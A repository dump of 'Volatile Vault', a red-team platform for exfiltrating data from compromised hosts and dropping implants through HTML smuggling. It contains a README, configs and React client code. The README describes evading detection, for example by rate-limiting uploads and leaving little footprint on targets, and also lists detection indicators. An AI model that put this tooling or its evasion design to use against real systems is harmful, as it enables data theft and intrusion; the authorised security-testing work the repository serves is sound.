├── .dockerignore ├── .env.template ├── .gitignore ├── .prettierrc ├── .vscode └── launch.json ├── Dockerfile ├── LICENSE ├── README.md ├── client ├── .env.sample ├── .gitignore ├── README.md ├── package-lock.json ├── package.json ├── public │ ├── favicon.ico │ ├── index.html │ ├── logo192.png │ ├── logo512.png │ ├── manifest.json │ ├── robots.txt │ └── vault.png ├── src │ ├── App.tsx │ ├── components │ │ ├── Authentication.tsx │ │ ├── BasicSelector.tsx │ │ ├── BasicWizard.tsx │ │ ├── EnterPassword.tsx │ │ ├── Main.tsx │ │ ├── ModeSelector.tsx │ │ ├── extensions │ │ │ ├── ExtensionManager.ts │ │ │ ├── exfil │ │ │ │ ├── AwsCloudFrontExfil.tsx │ │ │ │ ├── BasicHttpExfil.tsx │ │ │ │ └── DummyExfil.tsx │ │ │ ├── extension.tsx │ │ │ └── storage │ │ │ │ ├── AwsS3.tsx │ │ │ │ ├── DummyStorage.tsx │ │ │ │ └── FileSystem.tsx │ │ └── ui │ │ │ ├── CustomSteps.tsx │ │ │ ├── EventTable.tsx │ │ │ ├── GenericHttpDownload.tsx │ │ │ └── GenericHttpUpload.tsx │ ├── index.tsx │ ├── logo.svg │ ├── react-app-env.d.ts │ └── utils │ │ ├── Api.ts │ │ ├── Config.ts │ │ ├── Crypto.ts │ │ ├── Entropy.ts │ │ ├── Files.ts │ │ └── Snack.ts └── tsconfig.json ├── docker-compose.prod.yml ├── make_test_files.sh ├── screenshots ├── screenshot1-select.png ├── screenshot2-upload.png └── screenshot3-download.png └── server ├── .gitignore ├── README.md ├── config.example.yaml ├── logs └── .gitkeep ├── nodemon.json ├── package-lock.json ├── package.json ├── src ├── config │ ├── config.ts │ ├── instance.ts │ └── util.ts ├── extensions │ ├── exfil │ │ ├── AwsCloudFront │ │ │ ├── README.md │ │ │ ├── awscloudfront.ts │ │ │ ├── distributionconfig.json │ │ │ └── wrapper.ts │ │ ├── BasicHttp │ │ │ ├── README.md │ │ │ └── basichttp.ts │ │ └── provider.ts │ ├── extension.ts │ ├── repository.ts │ └── storage │ │ ├── AwsS3 │ │ ├── README.md │ │ ├── awss3.ts │ │ ├── bucketpolicy.json │ │ └── wrapper.ts │ │ ├── FileSystem │ │ ├── README.md │ │ └── filesystem.ts │ │ └── provider.ts ├── fs.ts ├── jwt.ts ├── logging.ts ├── routes │ ├── auth.ts │ ├── config.ts │ └── index.ts ├── server.ts └── streams.ts └── tsconfig.json /.dockerignore: -------------------------------------------------------------------------------- 1 | .dockerignore 2 | .git 3 | .gitignore 4 | .prettierrc 5 | **/node_modules 6 | 7 | -------------------------------------------------------------------------------- /.env.template: -------------------------------------------------------------------------------- 1 | BACKEND_PORT=1234 2 | FILE_EXPIRY=60 # Lifetime in minutes 3 | FILE_SIZE=104857600 # Maximum file size of uploads of encrypted blobs in bytes 4 | FS_FOLDER=./files # Folder to store encrypted blobs in 5 | JWT_EXPIRY=12 # Lifetime in minutes 6 | TOTP_SECRET=ABC # Should be at least 120 bits -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | npm-debug.log 3 | client/src/compiled/ 4 | .env 5 | *.bin -------------------------------------------------------------------------------- /.prettierrc: -------------------------------------------------------------------------------- 1 | singleQuote: true 2 | -------------------------------------------------------------------------------- /.vscode/launch.json: -------------------------------------------------------------------------------- 1 | { 2 | // Use IntelliSense to learn about possible attributes. 3 | // Hover to view descriptions of existing attributes. 4 | // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387 5 | "version": "0.2.0", 6 | "configurations": [ 7 | { 8 | "type": "node", 9 | "request": "launch", 10 | "name": "Backend", 11 | "skipFiles": [ 12 | "\\**" 13 | ], 14 | "runtimeExecutable": "npm", 15 | "runtimeArgs": [ 16 | "run-script", 17 | "start:nodemon" 18 | ], 19 | "cwd": "${workspaceFolder}/server", 20 | "outputCapture": "std" 21 | } 22 | ] 23 | } -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | # Setup and build the client 2 | 3 | FROM node:18-alpine as client 4 | 5 | WORKDIR /usr/app/client/ 6 | COPY client/package*.json ./ 7 | RUN npm install -qy 8 | COPY client/ ./ 9 | RUN rm ./.env 10 | RUN npm run build 11 | 12 | 13 | # Setup the server 14 | 15 | FROM node:18-alpine 16 | 17 | WORKDIR /usr/app/ 18 | COPY --from=client /usr/app/client/build/ ./server/public/ 19 | 20 | 21 | WORKDIR /usr/app/server/ 22 | COPY .env ./.env 23 | 24 | COPY server/package*.json ./ 25 | RUN npm install -qy 26 | COPY server/ ./ 27 | 28 | ENV PORT ${BACKEND_PORT} 29 | 30 | EXPOSE ${BACKEND_PORT} 31 | 32 | CMD ["npm", "start"] 33 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 Moritz Laurin Thomas 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |
2 | 3 |

Volatile Vault

4 |
5 | 6 |

Volatile Vault is a secure data exfiltration & dropper platform for Red Team Operators by @molatho & @secdude.

7 |

Inspired by updog.

8 |
9 | 10 |
11 | 12 | > [!WARNING] 13 | > **Disclaimer:** This repository, including all code, scripts, and documentation contained herein, is provided by NVISO exclusively for educational and informational purposes. The contents of this repository are intended to be used solely as a learning resource. The authors of this repository expressly disclaim any responsibility for any misuse or unintended application of the tools, code, or information provided within this repository. 14 | > Users are solely responsible for ensuring that their use of the repository complies with applicable laws and regulations. The authors of this repository do not provide any warranties or guarantees regarding the accuracy, completeness, or suitability of the contents for any particular purpose. 15 | > If you do not agree with these terms, you are advised not to use or access this repository. 16 | 17 | # Table of Contents 18 | - [Screenshots](#screenshots) 19 | - [Use Cases](#use-cases) 20 | - [Features](#features) 21 | - [Plugin Concept](#plugin-concept) 22 | - [Roadmap](#roadmap) 23 | - [FAQs](#faqs) 24 | - [Usage / Installation](#usage--installation) 25 | - [Deployment](#deployment) 26 | - [Development](#development) 27 | - [Contributing](#contributing) 28 | 29 | 30 | # Screenshots 31 | 32 |
33 | 34 | 35 | 36 |
37 | 38 | # Use Cases 39 | 40 | - **Data exfiltration**: Operators can upload sensitive files from compromised target systems to exfiltrate data securely, without any reliance on potentially untrustworthy third-parties. 41 | - **Dropping implants**: Operators can upload implants from their machines and download them on target systems and leverage HTML smuggling to more covertly transmit and deploy their implants. 42 | 43 | # Features 44 | 45 | - **Security first**: All data is encrypted/decrypted (using AES-GCM) and compressed/decompressed (ZIP DEFLATE) in the browser, no sensitive data hits the backend in plain text and no potentially sensitive key material ever leaves the browser. 46 | - **Volatile storage**: All uploaded data has a preconfigured life-time (e.g. one hour) after which it gets deleted on the server side. Any previously stored encrypted blobs are removed on the server side upon startup of the server application. 47 | - **AWS integration**: Volatile Vault can spin up and configure CloudFront distributions to proxy web traffic for uploads & downloads. Furthermore it can create S3 buckets and upload file to and from them! 48 | - **TOTP authentication**: Access to the service is granted by using a shared secret for TOTP authentication, making it easy to use and more resilient to credential leakage. 49 | - **Configurable**: Specifics such as the maximum allowed file size and life time of uploaded blobs can be configured in the [server](server/README.md)'s `config.yml` file before deployment of the application. 50 | - **Chunks + HTTPS redirectors**: Upload the encrypted blobs in chunks via a range of HTTP redirectors pointing to the service. 51 | - **Plugin system**: You can freely configure how data is uploaded/downloaded and where it is stored thanks to Volatile Vault's plugin system which allows the integration of multiple file storages and exfiltration mechanisms. 52 | 53 | ## Plugin Concept 54 | 55 | Volatile Vault allows you to mix and match plugins for file storages ("storages") and exfiltration mechanisms ("exfils") to your heart's content. Storages are plugins that store and retrieve files - this could be the server's filesystem or a cloud storage such as AWS S3. Exfils are data transports that allow you to upload and download files to and from Volatile Vault - this could be a simple built-in HTTP transport or an entirely different protocol such as QUIC. 56 | 57 | You can specify which storages and exfils to use by configuring them in (or ommitting them from) your [server](server/README.md)'s configuration. 58 | 59 | ## Roadmap 60 | 61 | - **Rate limiting**: Limit the upload speed to the service so uploads won't be as easy to detect as bursts. 62 | - **Password-encrypted Archives**: Encrypt the archives themselves so they can't be read in plain text on disk. 63 | - **Duplicate plugin instances**: Allow plugins to be initialized and used multiple times instead of once per implementation. 64 | 65 | ## FAQs 66 | 67 | Here are some Q&A's addressing Volatile Vault's shortcomings: 68 | 69 | > Q: Can we have multiple users? 70 | 71 | A: No. The declared goal of this app was to provide an easy-to-use and secure platform to exfiltrate data. It is meant to be used by small teams and for individual assessments, as part of your typical burner infrastructure, only. 72 | 73 | > Q: Why does this use TOTP? 74 | 75 | A: TOTP was chosen for its simplicity and implications for security: it's easy to set up (both parties only need to know the shared TOTP secret) and even if a SoC gets ahold of submitted tokens there's only a very brief time window in which they can re-use it. 76 | 77 | > Q: Why do I need to enter the TOTP every time I open/refresh the page? Can't use our session after authenticating? 78 | 79 | A: This application is not meant to be used over long time periods but only for exfiltrating data in select instances. Furthermore, by avoiding saving cookies or using localStorage, its footprint on the target system is reduced even further. 80 | 81 | # Detection 82 | 83 | We recommend implementing thorough network monitoring in any corporate context. Detection of network activity related to usage of VolatileVault could be detected based on: 84 | - Multiple transmissions of similar size to newly registered CloudFront domains. 85 | - Large uploads via QUIC. 86 | 87 | Additionally, in case TLS introspection is performed, one could scan for IOCs associated with VolatileVault, such as static strings: 88 | - `Non-functional dummy storage. This won't do anything and is only used for testing the frontend. It offers all capabilities Volatile Vault provides to storage extensions.` (taken from [DummyStorage](https://github.com/molatho/VolatileVault/blob/b0d79e908f7d92c05aabbdea181a2dec88580956/client/src/components/extensions/storage/DummyStorage.tsx#L15)) 89 | - `Welcome to Volatile Vault. This screen gives you fine-grained control over the way your data is being uploaded, downloaded and stored. Use the following wizard to configure your up- & downloads!` (taken from [BasicWizard](https://github.com/molatho/VolatileVault/blob/78afd19cb51eb26d71de25f8300ed6483d4604e3/client/src/components/BasicWizard.tsx#L214)) 90 | 91 | # Usage / Installation 92 | 93 | ## Deployment 94 | 95 | 1. Install Docker: `docker` and `docker compose` (ref [Install Docker Engine](https://docs.docker.com/engine/install/)) 96 | 2. **Configure the [server](server/README.md)** (seriously, you can't skip this) and [client](client/README.md) 97 | 3. Build and start the container by running `docker compose -f docker-compose.prod.yml up` 98 | 99 | ## Development 100 | 101 | 1. Install Node.js (v20+): `node` and `npm` (ref [Download Node.js](https://nodejs.org/en/download/package-manager)) 102 | 2. Install node dependencies of the client and server by `cd`'ing into their respective subdirectories and issuing `npm i` 103 | 3. **Configure the [server](server/README.md)** and [client](client/README.md) 104 | 4. Start the [server](ref) and [client](ref) 105 | 106 | # Contributing 107 | 108 | Pull requests are very welcome! 109 | -------------------------------------------------------------------------------- /client/.env.sample: -------------------------------------------------------------------------------- 1 | REACT_APP_BASE_URL=http://localhost:8888 2 | DEBUG=true -------------------------------------------------------------------------------- /client/.gitignore: -------------------------------------------------------------------------------- 1 | # See https://help.github.com/articles/ignoring-files/ for more about ignoring files. 2 | 3 | # dependencies 4 | /node_modules 5 | /.pnp 6 | .pnp.js 7 | 8 | # testing 9 | /coverage 10 | 11 | # production 12 | /build 13 | 14 | # misc 15 | .DS_Store 16 | .env.local 17 | .env.development.local 18 | .env.test.local 19 | .env.production.local 20 | 21 | npm-debug.log* 22 | yarn-debug.log* 23 | yarn-error.log* 24 | -------------------------------------------------------------------------------- /client/README.md: -------------------------------------------------------------------------------- 1 |
2 | 3 |

Volatile Vault - Client

4 |
5 |
6 | 7 | The Volatile Vault client lets users interface with its powerful backend. It's designed to be simple and simple to use. 8 | 9 | # Configuration 10 | 11 | The frontend is not very much configurable by itself as it queries information about enabled & configured storages and exfils from the [server](../server/README.md) at runtime. 12 | 13 | It can be configured by editing its `.env` file. You can find a template [here](.env.sample). 14 | 15 | ```env 16 | REACT_APP_BASE_URL=http://localhost:8888 17 | DEBUG=true 18 | ``` 19 | 20 | Fields: 21 | 22 | - `REACT_APP_BASE_URL`: Base URL of the API. Useful for debugging when the API and frontend aren't served by the same webserver. 23 | - `DEBUG`: Enables more verbose logging and the inclusion of "Dummy" storages and exfils. Useful for testing specific configurations at runtime. 24 | -------------------------------------------------------------------------------- /client/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "client", 3 | "version": "0.1.0", 4 | "private": true, 5 | "dependencies": { 6 | "@babel/plugin-proposal-private-property-in-object": "^7.21.11", 7 | "@emotion/react": "^11.11.3", 8 | "@emotion/styled": "^11.11.0", 9 | "@fontsource/roboto": "^5.0.8", 10 | "@mui/icons-material": "^5.15.8", 11 | "@mui/material": "^5.15.7", 12 | "@mui/styled-engine-sc": "^6.0.0-alpha.15", 13 | "@testing-library/jest-dom": "^5.17.0", 14 | "@testing-library/react": "^13.4.0", 15 | "@testing-library/user-event": "^13.5.0", 16 | "@types/jest": "^27.5.2", 17 | "@types/node": "^16.18.79", 18 | "@types/react": "^18.2.55", 19 | "@types/react-dom": "^18.2.18", 20 | "axios": "^1.6.7", 21 | "bytes": "^3.1.2", 22 | "file-saver": "^2.0.5", 23 | "jszip": "^3.10.1", 24 | "moment": "^2.30.1", 25 | "notistack": "^3.0.1", 26 | "react": "^18.2.0", 27 | "react-dom": "^18.2.0", 28 | "react-dropzone": "^14.2.3", 29 | "react-scripts": "^4.0.1", 30 | "styled-components": "^6.1.8", 31 | "typescript": "^4.9.5", 32 | "web-vitals": "^2.1.4" 33 | }, 34 | "scripts": { 35 | "start": "react-scripts --openssl-legacy-provider start", 36 | "build": "react-scripts --openssl-legacy-provider build", 37 | "eject": "react-scripts eject" 38 | }, 39 | "eslintConfig": { 40 | "extends": [ 41 | "react-app", 42 | "react-app/jest" 43 | ] 44 | }, 45 | "browserslist": { 46 | "production": [ 47 | ">0.2%", 48 | "not dead", 49 | "not op_mini all" 50 | ], 51 | "development": [ 52 | "last 1 chrome version", 53 | "last 1 firefox version", 54 | "last 1 safari version" 55 | ] 56 | }, 57 | "devDependencies": { 58 | "@types/bytes": "^3.1.4", 59 | "@types/file-saver": "^2.0.7" 60 | }, 61 | "resolutions": { 62 | "**/@typescript-eslint/eslint-plugin": "^4.1.1", 63 | "**/@typescript-eslint/parser": "^4.1.1" 64 | } 65 | } 66 | -------------------------------------------------------------------------------- /client/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/molatho/VolatileVault/85353c5310749299387598ff77f7d81daf8bd248/client/public/favicon.ico -------------------------------------------------------------------------------- /client/public/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 12 | 13 | 17 | 18 | 27 | Volatile Vault 28 | 29 | 30 | 31 |
32 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /client/public/logo192.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/molatho/VolatileVault/85353c5310749299387598ff77f7d81daf8bd248/client/public/logo192.png -------------------------------------------------------------------------------- /client/public/logo512.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/molatho/VolatileVault/85353c5310749299387598ff77f7d81daf8bd248/client/public/logo512.png -------------------------------------------------------------------------------- /client/public/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "short_name": "React App", 3 | "name": "Create React App Sample", 4 | "icons": [ 5 | { 6 | "src": "favicon.ico", 7 | "sizes": "64x64 32x32 24x24 16x16", 8 | "type": "image/x-icon" 9 | }, 10 | { 11 | "src": "logo192.png", 12 | "type": "image/png", 13 | "sizes": "192x192" 14 | }, 15 | { 16 | "src": "logo512.png", 17 | "type": "image/png", 18 | "sizes": "512x512" 19 | } 20 | ], 21 | "start_url": ".", 22 | "display": "standalone", 23 | "theme_color": "#000000", 24 | "background_color": "#ffffff" 25 | } 26 | -------------------------------------------------------------------------------- /client/public/robots.txt: -------------------------------------------------------------------------------- 1 | # https://www.robotstxt.org/robotstxt.html 2 | User-agent: * 3 | Disallow: 4 | -------------------------------------------------------------------------------- /client/public/vault.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/molatho/VolatileVault/85353c5310749299387598ff77f7d81daf8bd248/client/public/vault.png -------------------------------------------------------------------------------- /client/src/App.tsx: -------------------------------------------------------------------------------- 1 | import Main from './components/Main'; 2 | import { createTheme, CssBaseline } from '@mui/material'; 3 | import { ThemeProvider } from 'styled-components'; 4 | import { SnackbarProvider } from 'notistack'; 5 | 6 | const theme = createTheme({ 7 | palette: { 8 | mode: 'dark', 9 | }, 10 | }); 11 | 12 | function App() { 13 | return ( 14 | 15 | 16 | 17 |
18 | 19 | ); 20 | } 21 | 22 | export default App; 23 | -------------------------------------------------------------------------------- /client/src/components/Authentication.tsx: -------------------------------------------------------------------------------- 1 | import { useEffect, useState } from 'react'; 2 | import Api, { ApiResponse } from '../utils/Api'; 3 | import { snackError, snackInfo, snackSuccess } from '../utils/Snack'; 4 | import { 5 | Checkbox, 6 | FormControlLabel, 7 | Stack, 8 | TextField, 9 | Typography, 10 | } from '@mui/material'; 11 | 12 | interface AuthenticationProps { 13 | api: Api; 14 | onAuthenticated: (token: string) => void; 15 | } 16 | 17 | export default function Authentication({ 18 | api, 19 | onAuthenticated, 20 | }: AuthenticationProps) { 21 | const [totp, setTotp] = useState(''); 22 | const [totpEditAvailable, setTotpEditAvailable] = useState(true); 23 | const [lastError, setLastError] = useState(undefined); 24 | const [authenticated, setAuthenticated] = useState( 25 | undefined 26 | ); 27 | const [saveToken, setSaveToken] = useState(false); 28 | 29 | useEffect(() => { 30 | async function checkAuth() { 31 | const token = api.getToken(); 32 | try { 33 | const res = await api.isAuthenticated(); 34 | setAuthenticated(res.success); 35 | if (token == null) snackSuccess('Authentication successful'); 36 | onAuthenticated(token as string); 37 | } catch (err) { 38 | if (token != null) { 39 | api.clearToken(); 40 | snackError('Token expired or invalid; you need to re-authenticate.'); 41 | } else { 42 | snackInfo('You need to authenticate'); 43 | } 44 | setAuthenticated(false); 45 | } 46 | } 47 | checkAuth(); 48 | }, []); 49 | 50 | const onTotpChange = (event: React.ChangeEvent) => { 51 | setTotp(event.target.value); 52 | }; 53 | 54 | useEffect(() => { 55 | async function authenticate() { 56 | if (totp.length !== 6) return; 57 | setLastError(undefined); 58 | setTotpEditAvailable(false); 59 | try { 60 | const auth = await api.authenticate(totp); 61 | setAuthenticated(auth.success); 62 | setLastError(auth.success ? undefined : auth.message); 63 | snackSuccess('Authentication successful'); 64 | if (saveToken) api.saveToken(); 65 | onAuthenticated(auth.token as string); 66 | } catch (error) { 67 | const err = error as ApiResponse; 68 | setLastError(err.message); 69 | setTimeout(() => { 70 | setLastError(undefined); 71 | setTotpEditAvailable(true); 72 | setTotp(''); 73 | }, 1000); 74 | snackError(err.message); 75 | } 76 | } 77 | authenticate(); 78 | }, [totp]); 79 | 80 | return ( 81 | <> 82 | {authenticated === undefined && ( 83 | 84 | Validating authentication... 85 | 86 | )} 87 | {authenticated === false && ( 88 | 89 | 99 | setSaveToken(ev.target.checked)} 104 | /> 105 | } 106 | label="Save token in localStorage" 107 | /> 108 | 109 | )} 110 | 111 | ); 112 | } 113 | -------------------------------------------------------------------------------- /client/src/components/BasicSelector.tsx: -------------------------------------------------------------------------------- 1 | import { useState } from 'react'; 2 | import { BasicInfoHolder } from './extensions/Extension'; 3 | import { styled } from '@mui/material/styles'; 4 | import ArrowForwardIosSharpIcon from '@mui/icons-material/ArrowForwardIosSharp'; 5 | import MuiAccordion, { AccordionProps } from '@mui/material/Accordion'; 6 | import MuiAccordionSummary, { 7 | AccordionSummaryProps, 8 | } from '@mui/material/AccordionSummary'; 9 | import MuiAccordionDetails from '@mui/material/AccordionDetails'; 10 | import Typography from '@mui/material/Typography'; 11 | import { AccordionActions, Button } from '@mui/material'; 12 | 13 | const Accordion = styled((props: AccordionProps) => ( 14 | 15 | ))(({ theme }) => ({ 16 | border: `1px solid ${theme.palette.divider}`, 17 | '&:not(:last-child)': { 18 | borderBottom: 0, 19 | }, 20 | '&::before': { 21 | display: 'none', 22 | }, 23 | })); 24 | 25 | const AccordionSummary = styled((props: AccordionSummaryProps) => ( 26 | } 28 | {...props} 29 | /> 30 | ))(({ theme }) => ({ 31 | backgroundColor: 32 | theme.palette.mode === 'dark' 33 | ? 'rgba(255, 255, 255, .05)' 34 | : 'rgba(0, 0, 0, .03)', 35 | flexDirection: 'row-reverse', 36 | '& .MuiAccordionSummary-expandIconWrapper.Mui-expanded': { 37 | transform: 'rotate(90deg)', 38 | }, 39 | '& .MuiAccordionSummary-content': { 40 | marginLeft: theme.spacing(1), 41 | }, 42 | })); 43 | 44 | const AccordionDetails = styled(MuiAccordionDetails)(({ theme }) => ({ 45 | padding: theme.spacing(2), 46 | borderTop: '1px solid rgba(0, 0, 0, .125)', 47 | })); 48 | 49 | type SelectorType = 'Exfil' | 'Storage'; 50 | 51 | interface BasicSelectorProps { 52 | type: SelectorType; 53 | items: BasicInfoHolder[]; 54 | onSelected: (idx: number) => void; 55 | } 56 | 57 | export default function BasicSelector({ 58 | type, 59 | items, 60 | onSelected, 61 | }: BasicSelectorProps) { 62 | const [idx, setIdx] = useState(0); 63 | const [expanded, setExpanded] = useState(0); 64 | 65 | return ( 66 | <> 67 | {items.map((item, idx) => ( 68 | setExpanded(idx)} 72 | > 73 | 74 | {item.displayName} 75 | 76 | {item.description} 77 | 78 | 79 | 80 | 81 | ))} 82 | 83 | ); 84 | } 85 | -------------------------------------------------------------------------------- /client/src/components/BasicWizard.tsx: -------------------------------------------------------------------------------- 1 | import { useEffect, useState } from 'react'; 2 | import Api, { ApiConfigResponse, ApiResponse } from '../utils/Api'; 3 | import ModeSelector, { SelectedMode } from './ModeSelector'; 4 | import { ExfilExtension, StorageExtension } from './extensions/Extension'; 5 | import { 6 | getStorages, 7 | initializeExfilExtensions, 8 | } from './extensions/ExtensionManager'; 9 | import { 10 | Typography, 11 | Stepper, 12 | Step, 13 | StepLabel, 14 | StepContent, 15 | Box, 16 | Button, 17 | StepButton, 18 | } from '@mui/material'; 19 | import Authentication from './Authentication'; 20 | import BasicSelector from './BasicSelector'; 21 | import { snackError } from '../utils/Snack'; 22 | 23 | interface WizardProps { 24 | api: Api; 25 | onFinished: ( 26 | config: ApiConfigResponse, 27 | mode: SelectedMode, 28 | exfil: ExfilExtension, 29 | storage?: StorageExtension 30 | ) => void; 31 | } 32 | 33 | enum Steps { 34 | Authentication, 35 | SelectAction, 36 | SelectExfil, 37 | ConfigureExfil, 38 | SelectStorage, 39 | ConfigureStorage, 40 | Confirm, 41 | } 42 | 43 | export default function BasicWizard({ api, onFinished }: WizardProps) { 44 | const [storages, _] = useState(getStorages()); 45 | const [authenticated, setAuthenticated] = useState(false); 46 | const [config, setConfig] = useState( 47 | undefined 48 | ); 49 | const [mode, setMode] = useState('None'); 50 | const [exfils, setExfils] = useState([]); 51 | const [selectedExfil, setSelectedExfil] = useState( 52 | null 53 | ); 54 | const [exfilConfigured, setExfilConfigured] = useState(false); 55 | const [selectedStorage, setSelectedStorage] = 56 | useState(null); 57 | const [storageConfigured, setStorageConfigured] = useState(false); 58 | const [step, setStep] = useState(Steps.Authentication); 59 | const isUploadMode = mode == 'UploadChunked' || mode == 'UploadSingle'; 60 | 61 | 62 | useEffect(() => { 63 | async function getConfig() { 64 | try { 65 | const res = await api.config(); 66 | setConfig(res); 67 | } catch (error) { 68 | const err = error as ApiResponse; 69 | snackError(`Failed querying config: ${err.message}`); 70 | setAuthenticated(false); 71 | } 72 | } 73 | if (authenticated) getConfig(); 74 | }, [authenticated]); 75 | 76 | useEffect(() => { 77 | if (!config) return; 78 | setExfils( 79 | initializeExfilExtensions(api, config).filter((e) => e.isPresent()) 80 | ); 81 | }, [config]); 82 | 83 | function onAuthenticated(): void { 84 | setAuthenticated(true); 85 | setStep(Steps.SelectAction); 86 | } 87 | 88 | function onModeSelected(type: SelectedMode, exfils: ExfilExtension[]): void { 89 | setMode(type); 90 | setExfils(exfils); 91 | setStep(Steps.SelectExfil); 92 | } 93 | 94 | function onExfilSelected(idx: number): void { 95 | const exfil = exfils[idx]; 96 | setSelectedExfil(exfil); 97 | 98 | var nextStep = Steps.ConfigureExfil; 99 | 100 | if (!exfil.isConfigurable) { 101 | nextStep = Steps.SelectStorage; // Skip configuration step 102 | if (!isUploadMode) nextStep = Steps.ConfigureStorage + 1; // Skip storage selection + configuration step for downloads 103 | } 104 | 105 | setStep(nextStep); 106 | } 107 | 108 | function onStorageSelected(idx: number): void { 109 | const storage = storages[idx]; 110 | setSelectedStorage(storage); 111 | if (!storage.isConfigurable) 112 | setStep(Steps.ConfigureStorage + 1); // Skip configuration step 113 | else 114 | setStep(Steps.ConfigureStorage); 115 | } 116 | 117 | function modeToString(mode: SelectedMode): string { 118 | // "You'd like to ..." 119 | switch (mode) { 120 | case 'None': 121 | return 'do nothing'; 122 | case 'DownloadSingle': 123 | return 'perform a basic download'; 124 | case 'UploadSingle': 125 | return 'perform a basic upload'; 126 | case 'DownloadChunked': 127 | return 'perform a chunked download'; 128 | case 'UploadChunked': 129 | return 'perform a chunked upload'; 130 | } 131 | } 132 | 133 | function onStartOver(): void { 134 | setSelectedStorage(null); 135 | setSelectedExfil(null); 136 | setExfils( 137 | initializeExfilExtensions(api, config as ApiConfigResponse).filter((e) => 138 | e.isPresent() 139 | ) 140 | ); 141 | setMode('None'); 142 | setStep(0); 143 | setExfilConfigured(false); 144 | setStorageConfigured(false); 145 | } 146 | 147 | function onFinish() { 148 | onFinished( 149 | config as ApiConfigResponse, 150 | mode, 151 | selectedExfil as ExfilExtension, 152 | selectedStorage ? selectedStorage : undefined 153 | ); 154 | } 155 | 156 | const getExfilConfigLabel = () => { 157 | if (!selectedExfil) return No transport selected yet.; 158 | if (exfilConfigured) return {selectedExfil.displayName} configured.; 159 | if (!selectedExfil.isConfigurable) 160 | return {selectedExfil?.displayName} is not configurable.; 161 | 162 | return <>Configure {selectedExfil.displayName}:; 163 | }; 164 | 165 | const getStorageConfigLabel = () => { 166 | if (!selectedStorage) return No storage selected.; 167 | if (storageConfigured) 168 | return {selectedStorage.displayName} configured.; 169 | if (!selectedStorage.isConfigurable) 170 | return {selectedStorage?.displayName} is not configurable.; 171 | 172 | return <>Configure {selectedStorage.displayName}:; 173 | }; 174 | 175 | function onExfilConfigFinished(): void { 176 | setExfilConfigured(true); 177 | setStep(Steps.ConfigureExfil + 1); 178 | } 179 | 180 | function onStorageConfigFinished(): void { 181 | setStorageConfigured(true); 182 | setStep(Steps.ConfigureStorage + 1); 183 | } 184 | 185 | function onConfigChange(config: ApiConfigResponse): void { 186 | setConfig(config); 187 | } 188 | 189 | function navToModeSelect(): void { 190 | setStep(Steps.SelectAction); 191 | setMode('None'); 192 | setSelectedExfil(null); 193 | setSelectedStorage(null); 194 | } 195 | function navToExfilSelect(): void { 196 | setStep(Steps.SelectExfil); 197 | setSelectedExfil(null); 198 | setSelectedStorage(null); 199 | } 200 | function navToExfilConfig(): void { 201 | setStep(Steps.ConfigureExfil); 202 | setSelectedStorage(null); 203 | } 204 | function navToStorageSelect(): void { 205 | setStep(Steps.SelectStorage); 206 | } 207 | function navToStorageConfig(): void { 208 | setStep(Steps.ConfigureStorage); 209 | } 210 | 211 | return ( 212 | <> 213 | 214 | Welcome to Volatile Vault. This screen gives you fine-grained control 215 | over the way your data is being uploaded, downloaded and stored. Use the 216 | following wizard to configure your up- & downloads! 217 | 218 | 219 | {/* 0 - Authentication */} 220 | 221 | 222 | 223 | {authenticated ? Authenticated! : <>Authentication} 224 | 225 | 226 | 227 | 228 | 229 | 230 | {/* 1 - Select action */} 231 | 232 | 233 | 234 | {mode == 'None' ? ( 235 | 'What would you like to do?' 236 | ) : ( 237 | You will {modeToString(mode)}. 238 | )} 239 | 240 | 241 | 242 | 243 | 244 | 245 | {/* 2 - Select exfil */} 246 | 247 | 251 | 252 | {selectedExfil == null ? ( 253 | 'Which transport should be used for exfiltration?' 254 | ) : ( 255 | 256 | You will use {selectedExfil.displayName} for exfiltration. 257 | 258 | )} 259 | 260 | 261 | 262 | 267 | 268 | 269 | {/* 3 - Configure exfil */} 270 | 271 | 277 | {getExfilConfigLabel()} 278 | 279 | 280 | {selectedExfil?.isConfigurable && ( 281 | <> 282 | {selectedExfil.configView({ 283 | config: config as ApiConfigResponse, 284 | onChange: onConfigChange, 285 | })} 286 | 287 |
288 | 295 |
296 |
297 | 298 | )} 299 |
300 |
